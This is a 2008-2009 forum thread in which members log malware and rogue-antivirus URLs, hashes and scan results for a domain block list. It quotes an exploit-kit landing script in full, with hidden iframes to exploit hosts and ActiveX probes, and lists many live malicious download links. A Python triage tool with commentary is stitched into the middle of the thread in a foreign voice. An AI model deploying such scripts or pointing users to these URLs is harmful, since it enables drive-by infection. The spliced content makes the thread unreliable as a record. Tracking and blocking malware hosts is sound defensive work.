hxxp://bestratebid.net/botout/load.php?xpl=mdac
Result: 6/36 (16.67%)
http://www.virustotal.com/analisis/cd62f24af130e17769147181f78a3f81

No other domains seem to exist on this IP...
http://www.robtex.com/ip/64.86.16.11.html
Title: Re: daily something......
Post by: sowhat-x on November 13, 2008, 09:49:39 am
Code: [Select]

Quote
hxxp://2.gooanal.net/sis/getfile.php?f=pdf
Result: 9/36 (25.00%)
http://www.virustotal.com/analisis/70473d5c4c6da5906a23e02a06aa38f5

Quote
hxxp://dortumosio.com/11/pdf.php
Result: 11/36 (30.56%)
http://www.virustotal.com/analisis/4ac9dbbd008674a3608d641a6901baa1
Title: Re: daily something......
Post by: lanvin on November 14, 2008, 03:04:35 pm
Code: [Select]
Title: Re: daily something......
Post by: SysAdMini on November 14, 2008, 03:54:16 pm
Code: [Select]
91.203.93.61/25/2/getfile.php?f=pdf
beshragos.com/work/getfile.php?f=pdf

and some more in this nice article

http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html
Title: Re: daily something......
Post by: SysAdMini on November 19, 2008, 08:04:08 pm
Code: [Select]
hxxp://uin5.cn
Code: [Select]
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://sllwbd2.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd2.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.zghncsq.cn\/b2.htm width=50 height=0><\/iframe>")

Code: [Select]
hxxp://sllwbd2.cn/a1/ilink.html
hxxp://sllwbd2.cn/a1/flink.html
contain some flash exploits


http://www.virustotal.com/analisis/9bc0c8341d75029f720ae8bccb382691 14/36
http://www.virustotal.com/analisis/366887d40b9994e8652cbe7961fefcf6 14/36
http://www.virustotal.com/analisis/b4fe9309a779516d75886e3222f975b2 14/36
http://www.virustotal.com/analisis/b3618fd15fc152e18089c22a9c97fb65 14/36
http://www.virustotal.com/analisis/18634c476617d3855b49a3901437389d 14/36

Code: [Select]
hxxp://www.zghncsq.cn/b2.htm
takes you to
Code: [Select]
hxxp://sllwbd2.cn/a1/fxx.htm
with some more exploits
Code: [Select]
<script>
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=ss.html></iframe>");
window.status="═ŕ│╔";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://sllwbd2.cn/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://sllwbd2.cn/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";document.write("");
</script>

ends up in
Code: [Select]
hxxp://www.oiuytr.net/new/a11.css
http://www.virustotal.com/analisis/8ae968467b62acf4b9196cd8f6c287f6
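The landing script quoted above gates on a once-per-day cookie, branches on the user agent and probes ActiveX ProgIDs (one of them built by string concatenation) before writing zero-height iframes. As an added example, not code from the post or from the kit, here is a small static triage tool that extracts the iframe targets and ProgIDs from such a script and derives block-list hosts without executing it; the embedded sample is constructed after the quoted script with placeholder *.invalid hostnames, and the `Report`, `analyse` and `blocklist_hosts` names are assumptions of this example.

```python
"""Static triage of a captured exploit-kit landing script (added example)."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample modelled on the quoted script; hostnames are placeholders.
SAMPLE_SCRIPT = r'''
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://kit-a.invalid/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://kit-a.invalid/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/kit-b.invalid\/b2.htm width=50 height=0><\/iframe>")
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://kit-a.invalid/sina.htm></iframe>");}}
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try{Like = new ActiveXObject(rrooxx);}catch(error){}
'''

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.IGNORECASE)
HIDDEN_RE = re.compile(r'\bheight\s*=\s*["\']?0(?![\d.])', re.IGNORECASE)
ACTIVEX_RE = re.compile(r'new\s+ActiveXObject\s*\(\s*([^)]+?)\s*\)')
ASSIGN_RE = re.compile(r'\b([A-Za-z_]\w*)\s*=\s*"([^"]*)"\s*;')
CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


@dataclass
class Report:
    iframe_targets: list = field(default_factory=list)   # src values, in order
    hidden_iframes: int = 0                               # frames with height=0
    activex_progids: list = field(default_factory=list)  # ProgIDs the script probes
    cookie_gated: bool = False   # serves the exploit frames once per visitor
    ua_branching: bool = False   # different frame per browser family

    def score(self) -> int:
        """Crude triage score: 0 looks benign, 6 is the full kit pattern."""
        return (2 * (self.hidden_iframes > 0) + 2 * bool(self.activex_progids)
                + int(self.cookie_gated) + int(self.ua_branching))


def normalise(script: str) -> str:
    """Undo the two cheap obfuscations in the sample: escaped slashes
    inside strings and "a" + "b" literal concatenation (folded to a fixpoint)."""
    s = script.replace('\\/', '/')
    while True:
        folded = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', s)
        if folded == s:
            return s
        s = folded


def resolve_progid(arg: str, assignments: dict) -> str:
    # ActiveXObject() receives either a literal or a variable holding one.
    arg = arg.strip()
    if arg.startswith('"') and arg.endswith('"'):
        return arg[1:-1]
    return assignments.get(arg, '<unresolved:' + arg + '>')


def analyse(script: str) -> Report:
    s = normalise(script)
    rep = Report()
    for attrs in IFRAME_RE.findall(s):
        src = SRC_RE.search(attrs)
        if src and src.group(1) not in rep.iframe_targets:
            rep.iframe_targets.append(src.group(1))
        if HIDDEN_RE.search(attrs):
            rep.hidden_iframes += 1
    assignments = dict(ASSIGN_RE.findall(s))   # name -> string literal
    for arg in ACTIVEX_RE.findall(s):
        progid = resolve_progid(arg, assignments)
        if progid not in rep.activex_progids:
            rep.activex_progids.append(progid)
    rep.cookie_gated = ('document.cookie.indexOf(' in s
                        and 'document.cookie=' in s.replace(' ', ''))
    rep.ua_branching = 'navigator.userAgent' in s
    return rep


def blocklist_hosts(rep: Report) -> list:
    """Hosts of the absolute iframe targets, ready for a DNS or proxy block list."""
    hosts = {urlsplit(t).hostname for t in rep.iframe_targets if '://' in t}
    return sorted(h for h in hosts if h)


if __name__ == '__main__':
    r = analyse(SAMPLE_SCRIPT)
    print('score', r.score(), 'progids', r.activex_progids)
    print('block', blocklist_hosts(r))
```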
Title: Re: daily something......
Post by: sowhat-x on November 20, 2008, 06:38:23 pm
Quote
hxxp://sutra2s.info/in.cgi?16
hxxp://www.qualityvidz.com/index.php?id=1133&style=black
hxxp://www.wmpinstrument.com/download.php?id=1133
hxxp://porntube08.com/?t_type=amateurs&id=1264
hxxp://cleanlive.net/download/FlashPlayer.v1.264.exe

Quote
hxxp://mycigarworld.info/in.cgi?16
hxxp://mymostprivatevideo.com/exclusive2/id/3913000/2/black/white/
hxxp://softwareformyvideo.com/exe2/3913000.exe

Quote
hxxp://ieskok.info/in.cgi?6
hxxp://video-4.lovimomentinaslazdaisia.com/
hxxp://scan.scannerantispyware.com/419/6/
hxxp://files.downloadproas2009.com/load/setup_419_6777_.exe

Quote
hxxp://fastfind.info/in.cgi?17
hxxp://my-tubemovies-collection.com/promo2/?wmid=328
hxxp://my-tubemovies-collection.com/promo2/get.php?wmid=328&softname=full_dvd_video

Quote
hxxp://seaarch.info/in.cgi?11&group=2
hxxp://antivirusdefense.com/2009/1/en/freescan.php?id=77053501
hxxp://antivirusdefense.com/2009/download/trial/A9installertest_77053501.exe

Quote
hxxp://skyyy.info/in.cgi
hxxp://www.movzline.com/m5/index.php?id=1387&n=teen&a=usagi&v=309466.88888889
hxxp://www.wmpinstrument.com/download.php?id=1387
Title: Re: daily something......
Post by: lanvin on November 25, 2008, 06:52:33 pm

Title: Re: daily something......
Post by: lanvin on December 27, 2008, 03:56:30 pm
Title: Re: daily something......
Post by: bobby on January 02, 2009, 10:30:29 am
Code: [Select]
epeiy.com/wssl713fro.exe
http://www.virustotal.com/analisis/303be708a68899d8f1bad9591b9b4f89
Title: Re: daily something......
Post by: sparsha on January 06, 2009, 03:14:01 pm
Sites related to Rogue Apps
Title: Re: daily something......
Post by: SysAdMini on January 06, 2009, 08:55:56 pm
Quote
Sites related to Rogue Apps

Added to list.
Title: Re: daily something......
Post by: SysAdMini on January 07, 2009, 06:17:38 pm
Code: [Select]
http://www.bm-740.cn/new/new1.exe
..
http://www.bm-740.cn/new/new24.exe

http://www.threatexpert.com/report.aspx?md5=16146737ffcd2c74d7dd9e7881056172
Title: Re: daily something......
Post by: sparsha on January 11, 2009, 03:17:52 pm
more rogue apps related sites


Title: Re: daily something......
Post by: SysAdMini on January 11, 2009, 08:17:39 pm
Quote
more rogue apps related sites

Thank you. Added to list.
Title: Re: daily something......
Post by: sparsha on January 13, 2009, 09:27:02 am
AV2009 rogue sites: This gang is changing fake/scare scanner sites very frequently  >:(

Code: [Select]

http://bestantivirusdefense.com/2009/1/freescan.php?nu=77001101
http://privatewebsystemupdate.com/download/av_2009glof.exe

Title: Re: daily something......
Post by: sparsha on January 15, 2009, 05:26:20 pm
Spyware Protect 2009 related sites:

Code: [Select]
av10antivir.com/free_scan.exe
sp-protect2009.com
spwprotect2009.com
spyprotect2009.com
spywprotect2009.com
Spywprotect.com
swp2009.com
Title: Re: daily something......
Post by: SysAdMini on January 18, 2009, 05:34:15 pm
exploits/trojans

starting at
Code: [Select]
http://www.44aaaa.com/
redirects to urls where css files are trojans
Title: Re: daily something......
Post by: SysAdMini on January 19, 2009, 11:24:17 am
Title: Re: daily something......
Post by: sparsha on January 21, 2009, 12:05:57 pm
"XP Protection Center"

braviax/brastk advertised rogue

Title: Re: daily something......
Post by: SysAdMini on January 21, 2009, 01:02:43 pm
Quote
"XP Protection Center"

braviax/brastk advertised rogue

Thanks. Added.
Title: Re: daily something......
Post by: SysAdMini on January 21, 2009, 04:00:36 pm
I have added many zeus/zbot/wsnpoem urls to list in the last days.

http://www.malwaredomainlist.com/mdl.php?search=zeus%2F&colsearch=All&quantity=50&sort=Date
Title: Re: daily something......
Post by: SysAdMini on January 23, 2009, 04:01:33 pm
Some pdf exploits

Code: [Select]
hardmoviesporno.com/rf/exp/update1.pdf
Analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=6e2a9dc53394e4d4f844a91c6e430783&t=1232726861&type=js
http://www.virustotal.com/analisis/ff4c30c4e7bf97019e2595c659191103


Code: [Select]
hardmoviesporno.com/rf/exp/update2.pdf
Analysis:

http://wepawet.cs.ucsb.edu/view.php?hash=0d64591f2075368ff912ecc5ec7f9cb7&t=1232726875&type=js
http://www.virustotal.com/analisis/6c0c223baa85f44b0342072a51dc3877
Title: Re: daily something......
Post by: sparsha on January 23, 2009, 05:33:55 pm
Rogue pushed through Vxgame Trojan infection

Code: [Select]
hXXp://antivirusxppro2009.com/cgi-bin/download.pl?code=0000049
antivirusxppro2008.com

Title: Re: daily something......
Post by: SysAdMini on January 25, 2009, 11:00:59 am
Rotators

Code: [Select]
http://diettopseek.cn/in.cgi?cocacola
http://yourliteseek.cn/in.cgi?cocacola
http://litetoplocatesite.cn/in.cgi?cocacola2
http://litepremiumlist.cn/in.cgi?cocacola
http://nanotopfind.cn/in.cgi?cocacola

rotate to


exploits from all sites lead to the same file :

http://www.virustotal.com/analisis/1a10833084a81f73b84c2a40f64d6302 2/35 !!!!


Rogue
Code: [Select]
http://imunizator.net/
best-online-antivirus-scanner.info/scan.php
best-antivirus-2010-scanner.info/scan.php
best-antivirus-2010-download.info/install.php
antivirus-scanner-online.com/scan.php
Title: Re: daily something......
Post by: sparsha on January 26, 2009, 07:29:53 am
Rogues

Code: [Select]
http://antispyknight.biz/files/antispyknight.msi
http://antispyknight.info/files/antispyknight.msi
http://total-defender.com/download/total-defender-setup.exe
Title: Re: daily something......
Post by: SysAdMini on January 27, 2009, 12:51:39 am
Rogue Winiguard

Code: [Select]
94.247.2.173/.dif/go.php?sid=1
Redirectors to LuckySploit
Code: [Select]
94.247.2.50/.dif/go.php?sid=1
94.247.2.52/.dif/go.php?sid=1
94.247.2.157/.dif/go.php?sid=1
Title: Re: daily something......
Post by: aaudi on January 27, 2009, 02:53:37 am
already posted ... <modified>

hxxp://www.hoho-3.cn/ gr.exe - Downloader
Title: Re: daily something......
Post by: sparsha on January 27, 2009, 07:58:36 am
IE Security new rogue from IEDefender family.

Code: [Select]
http://ie-security.com/_download.aspx
http://216.240.151.112/ie.exe
https://secured-software-order.com/iesa2/
Title: Re: daily something......
Post by: aaudi on January 28, 2009, 04:36:45 am
Related to popups
Code: [Select]
hxxp://ifengw.com/TT.exe
Title: Re: daily something......
Post by: sparsha on January 28, 2009, 08:07:49 pm
XP Police Antivirus rogue sites: courtesy S!R!

Code: [Select]
xp-police.com
http://xp-police.com/installed.php?id=dress
http://xp-download-center.com/exe3/dress.exe


Title: Re: daily something......
Post by: sparsha on January 30, 2009, 02:03:36 pm
Sites related to SysAntivirus 2009 rogue application.

Code: [Select]
sysantivirus2009.com
http://files.sysav-download.com/load/setup_1_1_.exe
http://int.sysreport1.com/stat.php?func=installrun&id=1&landing=1&lang=EN&sub=0
http://dl.sysav-storage.com/get/?type=main&pin=1&lnd=1
http://int.sysreport2.com/stat.php?func=ok
http://int.sysreport1.com/dom1.php
http://sales.buysysantivirus2009.com/pay/MQ==_MA==_RTA5MDUwNzk=/1/

Title: Re: daily something......
Post by: sparsha on January 30, 2009, 07:18:09 pm
Sites related to  System Guard 2009 rogue application.

Code: [Select]
dlsg09.com
dlsgd3.com
getsysgd09.com
sg12scanner.com
sg9scanner.com
systemguard2009.com
systemguard2009m.com
Title: Re: daily something......
Post by: sparsha on February 01, 2009, 02:19:12 pm
Scam sites involved in distributing "Antivirus 2009" Rogue security application

Code: [Select]
http://internetinterestingplaces.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://pleaseclickhere.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://anti-malware-scanner.com/promo/1/freescan.php?nu=880479
http://antimalware-scanner.com/promo/1/freescan.php?nu=880182

Title: Re: daily something......
Post by: SysAdMini on February 06, 2009, 07:43:27 pm
Code: [Select]
hxxp://elkonline.pl/images/eventlist/venues/small/system
http://wepawet.cs.ucsb.edu/view.php?hash=b6f6603d951fdcdf047cc3815498ac94&t=1233950001&type=js
Title: Re: daily something......
Post by: SysAdMini on February 07, 2009, 01:27:27 pm
Code: [Select]
toppharma.net/123/sorted/pr/system
pixion.nl//foto/gallery/lente/images/system
http://wepawet.cs.ucsb.edu/view.php?hash=a247ae9bf05e543a750c686e75f3455b&t=1234013661&type=js

Code: [Select]
medamphetamin.cn/fffxxx3/
http://wepawet.cs.ucsb.edu/view.php?hash=ea313d55e625a0d576848943a6165b9f&t=1234038737&type=js
Title: Re: daily something......
Post by: sparsha on February 08, 2009, 03:53:10 am
Sites involved in distributing Rogue Security applications

Title: Re: daily something......
Post by: SysAdMini on February 08, 2009, 07:00:11 pm
Code: [Select]
http://xapaxapa.ru/todance1/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=e61e2bc83427a3c841a6ff970b76e249&t=1234120297&type=js
Title: Re: daily something......
Post by: sparsha on February 15, 2009, 03:24:49 pm
Antivirus 2009 related sites..
Code: [Select]
http://laspaceevents.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://malwareprosecurityscanner.com/promo/1/freescan.php?nu=880182&back==TQw1TD3NEMMMI=O
http://malwareprosecurityscan.com/promo/1/freescan.php?nu=880553&back==zQ02jD3NEMMMI=M
Title: Re: daily something......
Post by: sparsha on February 18, 2009, 05:29:57 pm
Rogues

Code: [Select]
xpvirusprotection.com
totalmalwareprotection.com
totalvirusprotection.com
Xpvirusprotection2009.com
malware-doc.com
Title: Re: daily something......
Post by: sparsha on February 19, 2009, 01:19:23 pm
Code: [Select]
av1-download.info
av1-site.info

http://downloads.anti-virus-2010.info/en/exe/StageThree.exe
http://downloads.anti-virus-2010.info/en/exe/StageTwo.exe
http://downloads.anti-virus-2010.info/en/exe/svchost.exe
http://downloads.anti-virus-2010.info/en/exe/QWProtect.dll

Title: Re: daily something......
Post by: sparsha on February 20, 2009, 01:04:39 pm
Code: [Select]
http://antivirus1-site.info/install.php
http://antivirus1-download.info/en/exe/install.exe
Title: Re: daily something......
Post by: SysAdMini on February 21, 2009, 03:43:56 am
Code: [Select]
www.luckffxi.com
http://wepawet.cs.ucsb.edu/view.php?hash=8e2190d1410d684b1b814a39b62288bb&t=1235188110&type=js

Code: [Select]
web.114baines.com/1/index.htm
http://wepawet.cs.ucsb.edu/view.php?hash=71c5258f6e3d469fabbe0eb372636e40&t=1235188376&type=js

Code: [Select]
www.hynno8744.cn/1/index.htm
http://wepawet.cs.ucsb.edu/view.php?hash=dd7e0777ff2996e20f947903e874c8b0&t=1235188509&type=js

Code: [Select]
down.114anhui.com/1/index.htm
http://wepawet.cs.ucsb.edu/view.php?hash=d912a96fa590ecfad9a77d60ca4fbcb8&t=1235189761&type=js

Code: [Select]
www.ffxionlion.com/download/ffxi.exe
http://www.virustotal.com/analisis/4e769eda073397abb033c663022d1ad4

Code: [Select]
www.ffxionlion.com/download/wow.exe
http://www.virustotal.com/analisis/5f1fb36b313ecea141a217e086fe02b9

Code: [Select]
www.ffxionlion.com/download/mj.exe
http://www.virustotal.com/analisis/42ec3ff4dcc6e56fa05951228b43de41
Title: Re: daily something......
Post by: SysAdMini on February 22, 2009, 03:50:10 pm
Code: [Select]
reddii.ru/traffic/sploit1/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=98857f2f00af684e185cdc1c165030a2&type=js

Title: Re: daily something......
Post by: sparsha on February 23, 2009, 09:43:35 am
Code: [Select]
xp-police-antivirus.com
Xp-police-2009.com
Xp-police-av.com
Xp-police-engine.com
xp-police-09.com

http://files.msdownloadsav.com/codec/codec_200002.exe
http://dl.msantivirstorage.com/get/?pin=200002&lnd=-1&type=main
http://int.ms-asreport1.com/dom1.php
Title: Re: daily something......
Post by: SysAdMini on February 23, 2009, 03:56:44 pm
Code: [Select]
hxxp://cccbbbb.cn/1/rr.htm
http://wepawet.cs.ucsb.edu/view.php?hash=a4d9fe888d4104e456afe2dd8df1367e&t=1235400090&type=js
Title: Re: daily something......
Post by: sparsha on February 24, 2009, 07:09:23 pm
Code: [Select]
http://stabilityinternetworld.com/download.php?affid=00000
http://stabilityinternetworld.com/install/installpv.exe
http://scanstabilityonline.com/download.php?affid=08100
Title: Re: daily something......
Post by: sowhat-x on February 26, 2009, 11:57:07 am
Few Pinches...
Title: Re: daily something......
Post by: SysAdMini on February 26, 2009, 07:00:41 pm
Code: [Select]
ultradant.cn/dis9/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bd77359c919df7385285588e2409df84&t=1235675351&type=js

http://www.virustotal.com/analisis/8222b3a4b72a2b49f689099ff81406b6 14/39


Code: [Select]
http://divinets.cn/z/5.htm
contains encoded iframes

Code: [Select]
211.95.79.58/y/index.php
many exploits
http://wepawet.cs.ucsb.edu/view.php?hash=5648ff6fc1ba1b43bcf2d7abc6770be4&t=1235473451&type=js

Code: [Select]
dvcd.info/evo/count.php?o=2
flash exploit dvcd.info/evo/exploits/x19.php?o=2&t=1235675434&i=1081047572
pdf exploit dvcd.info/evo/exploits/x18.php?o=2&t=1235675434&i=1081047572
exe dvcd.info/evo/getexe.exe?o=2&t=1235675434&i=1081047572&e=18
flash http://wepawet.cs.ucsb.edu/view.php?hash=c99916c1ad66815a48271f48f8e2db7a&type=swf
pdf http://wepawet.cs.ucsb.edu/view.php?hash=4d136b35fb9c3c50f1a7216b40bed9ed&t=1235677319&type=js
exe http://www.virustotal.com/analisis/3c3290226366784976aeb0c69f9c1517 21/39

Code: [Select]
prororo7.net/sp/index.php
prororo7.net/sp/s/f.pdf
http://wepawet.cs.ucsb.edu/view.php?hash=400499d9ab35a63f39552b25f9e04fbd&t=1235678776&type=js
http://www.virustotal.com/analisis/5b9a8bb60a602e71ea377e51ced56aaa 27/39


Code: [Select]
toureg-cwo.ch/fta/index.php
exploits/zbot
http://wepawet.cs.ucsb.edu/view.php?hash=66bab88192d8490d32e5c60a30231555&t=1235679132&type=js
http://www.virustotal.com/analisis/24b84a42c57c90a1a9dc69c8ae91dd1d 9/38

Code: [Select]
gavai-pegc9.ws/bI/index.php
exploits, redirects to toureg-cwo.ch
Title: Re: daily something......
Post by: SysAdMini on February 27, 2009, 02:58:30 pm
Code: [Select]
findrosain.ru/find/
http://wepawet.cs.ucsb.edu/view.php?hash=3c0b4261f5467c208d1c8bd07a2e9a0f&t=1235747603&type=js

Code: [Select]
findrosain.ru/love
http://wepawet.cs.ucsb.edu/view.php?hash=b2636ac6565fdc94e9e2a19cf46941d7&t=1235833030&type=js
Title: Re: daily something......
Post by: sparsha on February 27, 2009, 08:49:42 pm
Av2009 and Av360 Throwaway sites

Code: [Select]
http://thebestworldparty.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://proantimalwarescan.com/promo/1/freescan.php?nu=880479&back==

http://spaceindustrial.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://prosystemonlinescanner.com/promo/1/freescan.php?nu=880182&back==

http://worldcommercialbusiness.cn/soft.php?aid=0553&d=1&refer=d58bf6d15
http://pro-antimalware-scanner.com/promo/1/freescan.php?nu=880553&back==
Title: Re: daily something......
Post by: SysAdMini on February 28, 2009, 10:55:31 am
Exploits/trojan
Code: [Select]
breakingnews.usnewnews.com/liveinternet.js
breakingnews.usnewnews.com/fresh/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7ebea0ac579a5d9ca9e3156a662749e8&t=1235819223&type=js
http://www.virustotal.com/analisis/8eb587635d3bad9d37b9a5e7b06d2389
Title: Re: daily something......
Post by: SysAdMini on March 01, 2009, 03:36:49 pm
Code: [Select]
an92.net/myy/index.php
pdf exploits
Code: [Select]
an92.net/myy/firefox.pdf
http://www.virustotal.com/analisis/3089407073a361a9f3091e57ffbe3c99 16/39
MD5...: 61ac62ef2879e4ce1682f730f2015f09
http://wepawet.cs.ucsb.edu/view.php?hash=5eb164252fc11870b11a94b37f3f4394&t=1235921432&type=js

Code: [Select]
an92.net/myy/firefox2.pdf
http://www.virustotal.com/analisis/574194324cf37f372fb6fba43c282458 14/38
MD5...: 24ca3bb5e3843ad86fb8302f97cc709a
http://wepawet.cs.ucsb.edu/view.php?hash=742f6815506fe5158de1caf392d33025&t=1235921582&type=js

payload
Code: [Select]
an92.net/myy/load.php?xpl=pdf&browser=Firefox
http://www.virustotal.com/analisis/0e6347a92768298244d2a1969bc70fd4 4/39
MD5...: c0e86259278d8e3dba3fe346866022da
http://www.threatexpert.com/report.aspx?md5=c0e86259278d8e3dba3fe346866022da

requests
Code: [Select]
bucefal.org.ua/bro/ld.php?v=1&rs=76487-337-8429955-226141824245000&n=1&uid=1
Emo-loader
Title: Re: daily something......
Post by: SysAdMini on March 01, 2009, 04:28:57 pm
pdf exploit
Code: [Select]
www.kuplon.biz/smun/pdf.php?id=2435&vis=1
http://www.virustotal.com/analisis/47e606a0b63ebf3bcf819440f0da1441 13/39
MD5...: f1e5aa71ff2f65a7cf553ee011e2632c
http://wepawet.cs.ucsb.edu/view.php?hash=f66f78791092123d5e7989f47b548aa8&t=1235925405&type=js

payload
Code: [Select]
http://www.kuplon.biz/smun/load.php?id=2435&spl=69
http://www.virustotal.com/analisis/c90c5ce9e2386722d6c21b38e5888c76 3/39
MD5: b0acf2f559db5d993ff720a74febdc83
Title: Re: daily something......
Post by: SysAdMini on March 01, 2009, 05:15:55 pm
pdf exploit
Code: [Select]
www.geodll.biz/ar/spl/pdf.pdf
setcontrol.biz/ar/spl/pdf.pdf
http://www.virustotal.com/analisis/36622b4ff10e0293f3ed1b8e724d8a7c 6/39
MD5...: 647da8d2ee1213926331077babafb8e4
http://wepawet.cs.ucsb.edu/view.php?hash=a36fd77906ead994adcb7256c8be4a8c&t=1235928293&type=js

payload
Code: [Select]
geodll.biz/ar/exe.php
http://www.virustotal.com/analisis/fb7fc693aa7b63865d25628f17b4bb0c 11/38
MD5...: e8034060f4e05f9e461faf7e139f2f5d
Title: Re: daily something......
Post by: SysAdMini on March 03, 2009, 09:38:51 am
Code: [Select]
vsedlysna.ru/img/site/2/?viagra
http://wepawet.cs.ucsb.edu/view.php?hash=b0807cd3d6f0c516fbd64a54e58ff0d2&t=1236073833&type=js
http://www.virustotal.com/analisis/9ff9a32c276bbcd97b2119a79312bce2
Title: Re: daily something......
Post by: sparsha on March 07, 2009, 06:34:57 am
Malware Defender 2009 rogue related sites:

Code: [Select]
http://easywinscanner17.com/sysgd09_2/3/10284
MalwareDefender2009.com
http://gomaldef09.com/buy.html?track_id=10001&bill_id=0

http://89.149.251.181/maldef09/install.php?track_id=10284
http://89.149.251.181/maldef09/setup.php?track_id=10001
http://78.159.99.58/maldef09/install.php?track_id=10511

Title: Re: daily something......
Post by: sparsha on March 07, 2009, 12:15:41 pm
Av360 Throwaway sites contd...

Code: [Select]
http://whereismat.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://falloutneferwin.cn/soft.php?aid=0468&d=5&refer=bb916128e
http://whreismyplugnplay.cn/soft.php?aid=0560&d=1&refer=b8ced57fa
http://softwareoverworld.cn/soft.php?aid=0553&d=1&refer=d58bf6d15

http://fastantimalwarescan.com/promo/1/freescan.php?nu=880553&back==jQ20zj0NIMNMI=M
http://fast-antimalware-scanner.com/promo/1/freescan.php?nu=880182&back==DQ52zj0NIMMMI=M
http://fast-antimalware-scan.com/promo/1/freescan.php?nu=880468&back==zQ01Dj0NIMNMI=M

Title: Re: daily something......
Post by: sparsha on March 08, 2009, 11:37:47 am
Code: [Select]
Advancesoftpc.com
Antispywarepro.net
scanspywareonline.net
Pcspeed-up.com

http://www.netspywarescan.com/online-scan.html?ewmid=225
Title: Re: daily something......
Post by: bobby on March 09, 2009, 02:00:14 pm
Code: [Select]
http://easywinscanner17.com/maldef09_1/4/10242
http://fastantimalwarescan.com/promo/1/freescan.php?nu=880017&back=%3DTQ55jj2NAMNMI%3DO
Title: Re: daily something......
Post by: sparsha on March 12, 2009, 04:02:50 pm
Av360 Throwaway sites contd...

Code: [Select]
http://advertisechoice.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://vivaldinaruto.cn/soft.php?aid=1001&d=1&refer=184b911aa
http://awardspacelooksbig.cn/soft.php?aid=0468&d=5&refer=bb916128e


http://bestantimalwarescanner.com/promo/1/freescan.php?nu=880182&back==DQw3zj4NcMMMI=O
http://bestantimalwarelivescan.com/promo/1/freescan.php?nu=880468&back==TQ0xzj4NcMMMI=M
http://online-antimalware-scanner.com/promo/1/freescan.php?nu=881001&back==DQywDj3NAMNMI=O

ANG AntiVirus 09 rogue related

Code: [Select]
Angantivirus-2009.com
Angantivirus2009.com
Title: Re: daily something......
Post by: SysAdMini on March 12, 2009, 08:55:01 pm
Quote
Av360 Throwaway sites contd...

Code: [Select]
trustedpaymentsystem.com
antivirus360-protection.com
liveantivirusscanner.com

Title: Re: daily something......
Post by: SysAdMini on March 13, 2009, 02:37:19 pm
exploits/zbot

Code: [Select]
4you.vippif.com
http://wepawet.cs.ucsb.edu/view.php?hash=f73ece587f4d906b256f108bbdb486c9&t=1236954537&type=js
Title: Re: daily something......
Post by: sowhat-x on March 14, 2009, 05:58:56 pm
Title: Re: daily something......
Post by: sparsha on March 14, 2009, 07:35:37 pm
Rogue related


Title: Re: daily something......
Post by: sowhat-x on March 15, 2009, 02:28:14 pm
Quote
hxxp://nuclear777.com/1.1.0.0/
hxxp://videoblog.kilu.de/
Title: Re: daily something......
Post by: sowhat-x on March 15, 2009, 03:31:18 pm
Quote
hxxp://94.247.3.147/rot/xc01/index.php
hxxp://94.247.3.147/wpa/dog/index.php

Quote
